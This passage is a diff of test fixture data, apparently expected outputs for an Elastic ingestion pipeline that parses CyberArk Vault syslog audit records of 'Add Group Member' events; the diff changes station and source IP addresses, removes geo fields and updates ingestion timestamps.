\u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577519400Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -743,17 +614,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -770,7 +632,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -778,8 +640,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:17Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPGW_SSH\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPGW_SSH\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Group Member", "target_user": "PSMPGW_SSH", "source_user": "PVWAGWAccounts", @@ -795,8 +657,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730093300Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577525Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -808,17 +670,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -835,7 +688,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -843,8 +696,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:17Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPApp_SSH\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPApp_SSH\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Group Member", "target_user": "PSMPApp_SSH", "source_user": "PSMAppUsers", @@ -860,8 +713,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730110900Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577530300Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -873,17 +726,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -900,7 +744,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -908,8 +752,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:21Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMP_ADB_AppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMP_ADB_AppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Group Member", "target_user": "PSMP_ADB_asr-cyberark-psm-ssh", "source_user": "PSMP_ADB_AppUsers", @@ -925,8 +769,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730116300Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_AppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group 